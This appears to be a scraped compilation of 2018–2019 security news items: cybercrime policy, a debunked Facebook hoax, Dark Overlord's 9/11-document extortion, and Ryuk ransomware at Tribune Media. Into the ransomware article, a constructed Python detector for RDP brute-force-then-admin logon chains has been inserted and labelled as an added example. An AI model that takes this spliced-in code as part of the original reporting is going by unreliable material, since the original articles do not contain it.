Related to training, police officers are generally the first line of support for individual victims. But when the phone rings, it’s frustrating for officers trying to take a report or advise on next steps. All law enforcement agencies should have sufficient budget for cybercrime training, and an NSA-led agency like the NCSC should lead the way on training these officers.

Congress must revise the GSA schedule for federal employees in cybersecurity concentrations, and earmark funding for police training across all agencies because, as a nation, we can’t afford to continually lose our most talented people to the private sector.

Step 3: Empowering the Private Sector
The private sector has the knowledge and skills to be a force multiplier for law enforcement. Network defenders and researchers typically have better tools and data than law enforcement on cyber malfeasance. The current problem for the private sector is trust, or the lack thereof, with law enforcement. Specifically, private sector collaborators need protection from having the law wielded against them as a result of their efforts.

The past 15 years are a testament to the success of proactive private sector volunteers and working groups — DNS Changer is a great example. It was created to tackle dire cyber threats and assist with attribution.

A primary impediment to increased cooperation is the Computer Fraud and Abuse Act (CFAA) (18 US Code §1030), signed in 1986 and, to a lesser extent, Section 1201 of the Digital Millennium Copyright Act (DMCA) (17 US Code §1201). These two laws indiscriminately lump in valid cybersecurity research along with the most reprehensible of cybercrimes. The CFAA criminalizes “exceeding unauthorized access” to websites, which allows site owners to unilaterally prevent any investigation of potential vulnerabilities through prohibitions written in to terms of service.

Similarly, the DMCA penalizes almost any circumvention of copyright protections (including encryption protocols), which is often necessary to carry out security research. These federal laws are being augmented by state laws, such as legislation recently passed in Georgia, that perpetuate these oversights.

Revised legislation should reaffirm Fourth Amendment digital rights and also encourage law enforcement to share cybercrime case details (not national security cases or cases that began from a counterintelligence nexus) with the private sector where relevant. Legislative efforts should also creatively provide law enforcement with improved investigative tools (again, while reaffirming the Fourth Amendment), increase law enforcement budgets for training, and encourage all nations to adopt similar definitions for “unauthorized access.” Additionally, we should encourage more legislation like the Internet of Things Cybersecurity Improvement Act of 2017 that provides specific security research exemptions.

As a society, we have an incredibly skilled and willing modern-day private sector that has been diligently working behind the scenes toward a safer Internet. This is the reason that global malware attacks are relatively muted. For example, large-scale attacks like the Storm and WannaCry worms were poised for maximum destructive impact before the private sector intervened. Congress should do more to encourage good Samaritan efforts in the cybersecurity community and make it easier for law enforcement to consistently collaborate with them and vice versa.

Author Bios:

Fred Wolens is VP of Policy and Communications at Recorded Future, the real-time threat intelligence company. Fred oversees Recorded Future’s compliance programs, and manages many of the internal policies that guide the company’s intelligence efforts. Before joining Recorded Future, Fred was a member of Facebook’s Public Policy Team, managing PR and policy for many security, privacy, and safety issues. In the past, Fred has also worked with a number of technology companies including AirBnB, Uber, and SurveyMonkey, and with the Office of the Shadow Foreign Secretary in the United Kingdom researching technology policy. Fred holds a B.A. in Political Science from Stanford University, and a J.D./M.B.A. from Harvard.

Levi Gundert is the vice president of intelligence and risk at Recorded Future where he leads the continuous effort to measurably decrease operational risk for customers.
Levi has spent the past 20 years in both government and the private sector, defending networks, …

Article source: https://www.darkreading.com/threat-intelligence/taming-the-digital-wild-west/a/d-id/1333569?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Warn your friends they can’t bypass Facebook with this hoax

Sorry to say, but 2019 has not ushered in new “tips to bypass FB” as it supposedly limits posts on your news feed.

Nor has Facebook ushered in a new algorithm that “chooses the same few people – about 25 – who will read your posts”, at least not that we’ve heard.

Rather, we’re still stuck with whatever murky, stubbornly unfathomable algorithms Facebook uses to determine the order of content in our feeds, regardless of what the latest, breathless spin on this wheezy old hoax wants you to believe. To wit:

Thanks for the tips to bypass FB – it WORKS!! I have a whole new news feed. I’m seeing posts from people I haven’t seen in years.
Here’s how to bypass the system FB now has in place that limits posts on your news feed.
Their new algorithm chooses the same few people – about 25 – who will read your posts. Therefore, hold your finger down anywhere in this post and “copy” will pop up. Click “copy”. Then go to your page, start a new post and put your finger anywhere in the blank field. “Paste” will pop up; click paste. This will bypass the system. Hi new and old friends!

The last time we wrestled with this particular pudding was back in February when Snopes debunked the viral hoax and said no, a new Facebook algorithm will NOT only show you 26 friends.

Snopes pointed out at the time that the algorithm hoax followed on the heels of a real Facebook announcement from 11 January 2018 about a major overhaul in how newsfeed works.

It wasn’t about squeezing out your friends, though. In fact, Facebook had the opposite in mind: it said it was working to reverse the trend in which personal content from friends and family had been making way for an explosion of posts from corporations, businesses and media.

Snopes contacted Facebook to ask whether the claim of limiting personal interactions had merit. A representative said no, it does not. Why is the rumor, then, still lying its way to the top of newsfeeds? By convincing a user to copy and paste, rather than share the post, it’s much harder to shut it down.

The best thing you can do is carefully sidestep this cow patty. You can also do us all a solid by warning your friends not to perpetuate the spread of fake news posts.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/JbtCSfxZw8g/

Dark Overlord hackers release alleged 9/11 lawsuit documents

Bright new year, slimy return of The Dark Overlord (TDO), a well-known group of highly self-amusing cyber extortionists who’ve now chosen 9/11-related firms to pick on.

The group announced on Pastebin (content now removed) on New Year’s Eve that it had hacked a law firm that handles cases relating to the 11 September 2001 terrorist attacks. It threatened to publicly release what it claimed are gigabytes of confidential, litigation-related documents:

E-mails, retainer agreements, non-disclosure agreements, settlements, litigation strategies, liability analysis, defence formations, collection of expert witness testimonies, testimonies, communications with government officials in countries all over the world, voice mails, dealings with the FBI, USDOJ, DOD, and more, confidential communications, and so much more.

The gang is apparently expanding its repertoire to include capitalizing on conspiracy theories. It tweeted on Monday about “providing many answers” about such conspiracies with the document cache.

Come and get ’em, TDO said to terrorists and enemy states:

If you’re a terrorist organisation such as ISIS/ISIL, Al-Qaeda, or a competing nation state of the USA such as China or Russia, you’re welcome to purchase our trove of documents.

Then, on Wednesday morning, TDO announced on Pastebin (content now removed) that it had released a teaser’s worth of documents to verify its claims. It presented a tiered plan to “release each layer of damaging documents that are filled with new truths, never before seen.”

Each layer contains more secrets, more damaging materials, more SSI [Sensitive Security Information], more SCI [Special Compartment Information], more government investigation materials, and generally just more truth. Consider our motivations (money, specifically Bitcoin), we’re not inclined to leak the juiciest items until we’re paid in full.

As of yesterday afternoon, the group’s bitcoin wallet had received three payments. Also yesterday, Twitter suspended an account, @tdo_h4ck3rs, that recently began selling access to stolen legal documents.

In its post on Monday, TDO said that it had hacked New York-based real estate developer Silverstein Properties – one of the companies mentioned in 9/11 conspiracy theories – along with insurers Hiscox Syndicates and Lloyds of London, among several other insurers and legal firms. TDO said it had discovered the sensitive, 9/11-associated information when it went through the allegedly stolen documents.

Hiscox told the Financial Times [paywalled content] that any of its documents claimed by TDO came from an old breach:

The law firm’s systems are not connected to Hiscox’s IT infrastructure and Hiscox’s own systems were unaffected by this incident. One of the cases the law firm handled for Hiscox and other insurers related to litigation arising from the events of 9/11, and we believe that information relating to this was stolen during that breach.

TDO said that the hacked legal firm – allegedly Blackwell Sanders Peper Martin, now called Husch Blackwell – paid the ransom a few months ago. But according to the Financial Times, the company said in a statement that no, it hadn’t been hacked. Rather, the crooks got their hands on old documents written on old letterhead:

Several documents bearing the letterhead of a predecessor law firm to Husch Blackwell were made public earlier this week by a cyber terrorist group.

After a thorough review Husch Blackwell can confirm that no documents were obtained from Husch Blackwell and that there was no unauthorised access to Husch Blackwell systems, client files, documents or data.

TDO said that yes, the law firm paid, but it had also gone to the police. That wasn’t what we agreed, TDO said, so we’ll release the information… once our bitcoin wallet is full of cash, that is.

Extorting money and then publishing stolen documents anyway is par for the course for the gang.

TDO, which held an entire school district for ransom and issued death threats to children, has also gone after healthcare organizations. And as its puffed-up prose gleefully lectures readers, it was also responsible for extorting Netflix (though the company refused to pay).

It likes to do things like that: threaten the lives of children, and spoil the release of Season 5 of Orange Is the New Black.

In spite of having received 50 bitcoins (worth about $50,000 at the time) from an audio post-production studio in Hollywood, TDO went right ahead and released the show anyway.

The FBI is reportedly investigating the theft of the 9/11-related documents. It’s declined to comment.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/WalH9fSz7e4/

US newspapers battle ransomware

As if the US newspaper industry doesn’t have enough to contend with, on the morning of 29 December one of its largest publishing groups, Tribune Media, found itself battling a major ransomware attack.

This caused big problems for many newspapers in its stable, including the Chicago Tribune and New York Daily News, as well as the Los Angeles Times and San Diego Union-Tribune, which were sold last year but still share Tribune Media’s publishing platform.

The disruption varied from title to title, but in most cases Saturday’s delivery was delayed by up to 24 hours, while other titles were printed without their regular sections.

Even The New York Times and The Wall Street Journal, which were not directly affected but share an LA printing press for some editions, were disrupted.

But who was to blame?

A report in the Los Angeles Times said an informed source had identified a “foreign entity,” before going on to mention an important detail:

One company insider, who was not authorized to comment publicly, said the corrupted Tribune Publishing computer files contained the extension “.ryk,” which is believed to be a signature of a “Ryuk” attack.

As our recent article on the topic noted, Ryuk has been connected to North Korea on the basis of some similarities (such as the encryption used) between it and another ransomware called Hermes, which some people attribute to North Korea’s Lazarus Group.

So, taken at face value, there is a loose connection to North Korea. Attributing the attacks to a state actor makes the attack geopolitical, which makes for more interesting commentary and exciting headlines. And perhaps it makes it easier for the victim to explain how an intruder found themselves in a position to run ransomware on their network too.

But security companies are unenthusiastic about this sort of finger-pointing, and Sophos is no exception. Even in cases where there’s a lot more information on which to base a judgement, attribution is extremely difficult.

Beyond the fact that we have little evidence of anything (the company hasn’t even mentioned receiving a ransom note), all attackers have an incentive to make it look like somebody else is behind their work, and ransomware groups have a history of copying one another’s code and tactics.

For example, one of the ways that Ryuk finds its way onto a victim’s network is via weak RDP (Remote Desktop Protocol) credentials, a method common to almost all targeted ransomware.

From there, targeted ransomware attackers will typically try to make themselves a domain administrator, which gives them tremendous power, allowing them to attack security software and deploy and run their malware to best effect.
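The two-step sequence just described (a burst of failed RDP logons, a success from the same source, then a logon that receives administrative rights) is also something a defender can look for in the Windows Security log. The script below is an added example, not code from the Naked Security article or from Sophos; it runs over constructed log lines that mimic Security events 4625 (failed logon), 4624 (successful logon) and 4672 (special privileges assigned), with logon type 10 marking Remote Desktop sessions. The pipe-separated line format, the field names and the threshold values are assumptions for the example; a real export would need its own parser.

```python
"""Detect the RDP brute-force -> success -> admin-privilege chain.

Added example: scans constructed, simplified Security-log lines for
 - many failed RemoteInteractive (RDP) logons from one source address,
 - a successful RDP logon from that same source shortly afterwards,
 - a 4672 (admin-level "special privileges") event for that account.
"""
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

RDP_LOGON_TYPE = 10          # Windows LogonType 10 = RemoteInteractive (RDP)
EVENT_FAILED_LOGON = 4625    # An account failed to log on
EVENT_SUCCESS_LOGON = 4624   # An account was successfully logged on
EVENT_SPECIAL_PRIVS = 4672   # Special privileges assigned to new logon

# Constructed sample (assumption: "timestamp | event_id | key=value ..." per line).
SAMPLE_LOG = """\
2018-12-28T22:01:05 | 4625 | LogonType=10 | Account=jsmith | Src=203.0.113.7
2018-12-28T22:01:06 | 4625 | LogonType=10 | Account=jsmith | Src=203.0.113.7
2018-12-28T22:01:07 | 4625 | LogonType=10 | Account=administrator | Src=203.0.113.7
2018-12-28T22:01:08 | 4625 | LogonType=10 | Account=jsmith | Src=203.0.113.7
2018-12-28T22:01:09 | 4625 | LogonType=10 | Account=jsmith | Src=203.0.113.7
2018-12-28T22:01:10 | 4625 | LogonType=10 | Account=jsmith | Src=203.0.113.7
2018-12-28T22:02:30 | 4624 | LogonType=10 | Account=jsmith | Src=203.0.113.7
2018-12-28T22:03:00 | 4672 | Account=jsmith
2018-12-28T22:05:00 | 4625 | LogonType=10 | Account=alee | Src=198.51.100.4
2018-12-28T22:05:20 | 4624 | LogonType=10 | Account=alee | Src=198.51.100.4
2018-12-28T22:05:25 | 4672 | Account=alee
2018-12-28T22:06:00 | 4624 | LogonType=3 | Account=svc-backup | Src=10.0.0.12
"""


@dataclass
class Event:
    ts: datetime
    event_id: int
    logon_type: int      # -1 when the event carries no LogonType (e.g. 4672)
    account: str
    src: str             # "-" when the event carries no source address


def parse_log(text: str) -> List[Event]:
    """Parse the constructed line format into Event records, oldest first."""
    events: List[Event] = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = [p.strip() for p in line.split("|")]
        fields: Dict[str, str] = {}
        for part in parts[2:]:
            key, _, value = part.partition("=")
            fields[key] = value
        events.append(Event(
            ts=datetime.fromisoformat(parts[0]),
            event_id=int(parts[1]),
            logon_type=int(fields.get("LogonType", -1)),
            account=fields.get("Account", "-"),
            src=fields.get("Src", "-"),
        ))
    events.sort(key=lambda e: e.ts)
    return events


def detect(events: List[Event], threshold: int = 5,
           window: timedelta = timedelta(minutes=10)) -> List[Tuple[str, str]]:
    """Return (alert_kind, subject) pairs for the brute-force chain."""
    alerts: List[Tuple[str, str]] = []
    failures: Dict[str, deque] = defaultdict(deque)  # src -> recent failure times
    flagged_src = set()
    suspicious: Dict[str, datetime] = {}             # account -> time of suspect success

    for e in events:
        if e.event_id == EVENT_FAILED_LOGON and e.logon_type == RDP_LOGON_TYPE:
            q = failures[e.src]
            q.append(e.ts)
            while q and e.ts - q[0] > window:       # keep only failures inside the window
                q.popleft()
            if len(q) >= threshold and e.src not in flagged_src:
                flagged_src.add(e.src)
                alerts.append(("rdp_bruteforce", e.src))
        elif e.event_id == EVENT_SUCCESS_LOGON and e.logon_type == RDP_LOGON_TYPE:
            recent = sum(1 for t in failures.get(e.src, ()) if e.ts - t <= window)
            if recent >= threshold:                 # success right after a burst of failures
                alerts.append(("bruteforce_success", f"{e.src}:{e.account}"))
                suspicious[e.account] = e.ts
        elif e.event_id == EVENT_SPECIAL_PRIVS:
            t: Optional[datetime] = suspicious.get(e.account)
            if t is not None and e.ts - t <= window:  # admin rights on a suspect session
                alerts.append(("privileged_logon_after_bruteforce", e.account))
    return alerts


def run_sample() -> List[Tuple[str, str]]:
    """Run the detector over the constructed sample log."""
    return detect(parse_log(SAMPLE_LOG))


if __name__ == "__main__":
    for kind, subject in run_sample():
        print(f"{kind}: {subject}")
```

In the sample, the burst from 203.0.113.7 trips all three stages, while alee's single failure followed by a success and a 4672 event raises nothing, which is the point of chaining the stages: a lone 4672 is routine for any administrator, and only its proximity to a brute-force success makes it worth an analyst's time. The network logon (type 3) is ignored because the detector is scoped to RDP sessions.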

The tenuous nature of attribution, and the similarity between targeted ransomware attacks, arguably makes the focus on exactly which bit of malware was used in the culmination of the attack a bit of a red herring. If an organisation is vulnerable to one kind of targeted ransomware group, it’s probably vulnerable to more than one, and you’re going to read about whichever attacker found the victim first.

The silver lining in all this grim uniformity is that a similar set of defensive tactics works for all kinds of targeted ransomware attacks. You can read more about those in our article on How to defend yourself against SamSam ransomware.

With SamSam, the US Government pursued the attackers quietly before apparently deciding to use the naming of suspects as a deterrent against future attacks.

Whoever was behind the attack on Tribune Media was obviously undeterred.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/sSmNiY58cz0/